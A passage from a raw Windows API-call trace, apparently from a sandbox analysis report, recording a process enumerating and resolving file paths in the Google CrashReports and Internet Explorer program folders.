out: lpBuffer="C:\\Program Files (x86)\\Google\\CrashReports", lpFilePart=0x0) returned 0x2a [0114.396] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0114.397] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c82ea80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6c82ea80, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6c82ea80, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0114.397] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c82ea80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6c82ea80, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6c82ea80, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0114.397] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0114.397] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0114.397] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0114.398] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c82ea80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6c82ea80, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6c82ea80, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0114.398] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c82ea80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6c82ea80, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6c82ea80, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0114.398] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0114.398] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0114.398] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.398] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.398] CoTaskMemFree (pv=0x508980) [0114.398] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.399] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Internet Explorer", nBufferLength=0x105, lpBuffer=0x2aedb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Internet Explorer", lpFilePart=0x0) returned 0x28 [0114.399] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0114.399] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1ea40f84, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0114.399] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x228ba44f, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0114.399] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2a37297, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb2a37297, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb2a5d3f7, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x23800, dwReserved0=0x0, dwReserved1=0x0, cFileName="ExtExport.exe", cAlternateFileName="")) returned 1 [0114.400] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2be033e8, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x2be033e8, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x90894420, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xc600, dwReserved0=0x0, dwReserved1=0x0, cFileName="hmmapi.dll", cAlternateFileName="")) returned 1 [0114.400] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7f46f7c, ftCreationTime.dwHighDateTime=0x1c9ea10, ftLastAccessTime.dwLowDateTime=0xd7f46f7c, ftLastAccessTime.dwHighDateTime=0x1c9ea10, ftLastWriteTime.dwLowDateTime=0xd7f6d0dc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xa59, dwReserved0=0x0, dwReserved1=0x0, cFileName="ie8props.propdesc", cAlternateFileName="")) returned 1 [0114.400] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb22549a9, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb22549a9, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb22a0c69, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="iecompat.dll", cAlternateFileName="")) returned 1 [0114.400] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb22ecf2a, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb22ecf2a, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb23391ea, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xd2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="iedvtool.dll", cAlternateFileName="")) returned 1 [0114.400] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb273d712, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb273d712, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb27fbdf3, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5b200, dwReserved0=0x0, dwReserved1=0x0, cFileName="ieinstal.exe", cAlternateFileName="")) returned 1 [0114.400] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb27a3bdc, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0xb27a3bdc, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x6b1085f0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1c400, dwReserved0=0x0, dwReserved1=0x0, cFileName="ielowutil.exe", cAlternateFileName="")) returned 1 [0114.400] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb23391ea, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb23391ea, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb23854ab, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x27e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ieproxy.dll", cAlternateFileName="")) returned 1 [0114.401] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb27fbdf3, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb27fbdf3, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb27fbdf3, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x31000, dwReserved0=0x0, dwReserved1=0x0, cFileName="IEShims.dll", cAlternateFileName="")) returned 1 [0114.401] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2e87a7f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb2e87a7f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb2eadbdf, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa4510, dwReserved0=0x0, dwReserved1=0x0, cFileName="iexplore.exe", cAlternateFileName="")) returned 1 [0114.401] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2a5d3f7, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb2a5d3f7, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb2aa96b8, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x0, dwReserved1=0x0, cFileName="jsdbgui.dll", cAlternateFileName="")) returned 1 [0114.401] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8d665b0, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0xb8d665b0, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x97045ab0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1e000, dwReserved0=0x0, dwReserved1=0x0, cFileName="jsdebuggeride.dll", cAlternateFileName="")) returned 1 [0114.401] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8d8c70f, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0xb8d8c70f, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x97045ab0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1d400, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSProfilerCore.dll", cAlternateFileName="")) returned 1 [0114.401] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2aa96b8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb2aa96b8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb2acf818, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x56400, dwReserved0=0x0, dwReserved1=0x0, cFileName="jsprofilerui.dll", cAlternateFileName="")) returned 1 [0114.402] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4239426f, ftCreationTime.dwHighDateTime=0x1ca0405, ftLastAccessTime.dwLowDateTime=0x4239426f, ftLastAccessTime.dwHighDateTime=0x1ca0405, ftLastWriteTime.dwLowDateTime=0x67fe631c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x40df8, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdbg2.dll", cAlternateFileName="")) returned 1 [0114.402] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68b0ea3c, ftCreationTime.dwHighDateTime=0x1c9ea10, ftLastAccessTime.dwLowDateTime=0x68b0ea3c, ftLastAccessTime.dwHighDateTime=0x1c9ea10, ftLastWriteTime.dwLowDateTime=0x68b34b9c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x56df8, dwReserved0=0x0, dwReserved1=0x0, cFileName="pdm.dll", cAlternateFileName="")) returned 1 [0114.402] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x9bb8508b, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x9bb8508b, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SIGNUP", cAlternateFileName="")) returned 1 [0114.402] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8bc0b7dd, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8bc0b7dd, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8bc0b7dd, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2e600, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqmapi.dll", cAlternateFileName="")) returned 1 [0114.402] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0114.402] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0114.402] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0114.404] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Internet Explorer\\hmmapi.dll", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Internet Explorer\\hmmapi.dll", lpFilePart=0x0) returned 0x33 [0114.404] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Internet Explorer\\ie8props.propdesc", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Internet Explorer\\ie8props.propdesc", lpFilePart=0x0) returned 0x3a [0114.404] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Internet Explorer\\iecompat.dll", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Internet Explorer\\iecompat.dll", lpFilePart=0x0) returned 0x35 [0114.404] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Internet Explorer\\iedvtool.dll", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Internet Explorer\\iedvtool.dll", lpFilePart=0x0) returned 0x35 [0114.404] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Internet Explorer\\ieinstal.exe", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Internet Explorer\\ieinstal.exe", lpFilePart=0x0) returned 0x35 [0114.404] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Internet Explorer\\ielowutil.exe", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Internet Explorer\\ielowutil.exe", lpFilePart=0x0) returned 0x36 [0114.405] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Internet Explorer\\ieproxy.dll", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Internet Explorer\\ieproxy.dll", lpFilePart=0x0) returned 0x34 [0114.405] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Internet Explorer\\IEShims.dll", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Internet Explorer\\IEShims.dll", lpFilePart=0x0) returned 0x34 [0114.405] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", lpFilePart=0x0) returned 0x35 [0114.405] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Internet Explorer\\jsdbgui.dll", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Internet Explorer\\jsdbgui.dll", lpFilePart=0x0) returned 0x34 [0114.405] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Internet Explorer\\jsdebuggeride.dll", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Internet Explorer\\jsdebuggeride.dll", lpFilePart=0x0) returned 0x3a [0114.405] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Internet Explorer\\JSProfilerCore.dll", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Internet Explorer\\JSProfilerCore.dll", lpFilePart=0x0) returned 0x3b [0114.406] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Internet Explorer\\jsprofilerui.dll", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Internet Explorer\\jsprofilerui.dll", lpFilePart=0x0) returned 0x39 [0114.406] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Internet Explorer\\msdbg2.dll", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Internet Explorer\\msdbg2.dll", lpFilePart=0x0) returned 0x33 [0114.406] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Internet Explorer\\pdm.dll", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Internet Explorer\\pdm.dll", lpFilePart=0x0) returned 0x30 [0114.406] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Internet Explorer\\sqmapi.dll", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Internet Explorer\\sqmapi.dll", lpFilePart=0x0) returned 0x33 [0114.406] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0114.406] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Internet Explorer\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1ea40f84, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0114.407] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1ea40f84, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0114.407] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x228ba44f, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0114.407] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2a37297, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb2a37297, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb2a5d3f7, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x23800, dwReserved0=0x0, dwReserved1=0x0, cFileName="ExtExport.exe", cAlternateFileName="")) returned 1 [0114.407] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2be033e8, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x2be033e8, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x90894420, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xc600, dwReserved0=0x0, dwReserved1=0x0, cFileName="hmmapi.dll", cAlternateFileName="")) returned 1 [0114.407] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7f46f7c, ftCreationTime.dwHighDateTime=0x1c9ea10, ftLastAccessTime.dwLowDateTime=0xd7f46f7c, ftLastAccessTime.dwHighDateTime=0x1c9ea10, ftLastWriteTime.dwLowDateTime=0xd7f6d0dc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xa59, dwReserved0=0x0, dwReserved1=0x0, cFileName="ie8props.propdesc", cAlternateFileName="")) returned 1 [0114.408] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb22549a9, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb22549a9, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb22a0c69, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="iecompat.dll", cAlternateFileName="")) returned 1 [0114.408] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb22ecf2a, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb22ecf2a, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb23391ea, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xd2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="iedvtool.dll", cAlternateFileName="")) returned 1 [0114.408] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb273d712, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb273d712, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb27fbdf3, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5b200, dwReserved0=0x0, dwReserved1=0x0, cFileName="ieinstal.exe", cAlternateFileName="")) returned 1 [0114.408] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb27a3bdc, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0xb27a3bdc, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x6b1085f0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1c400, dwReserved0=0x0, dwReserved1=0x0, cFileName="ielowutil.exe", cAlternateFileName="")) returned 1 [0114.409] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb23391ea, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb23391ea, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb23854ab, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x27e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ieproxy.dll", cAlternateFileName="")) returned 1 [0114.409] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb27fbdf3, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb27fbdf3, 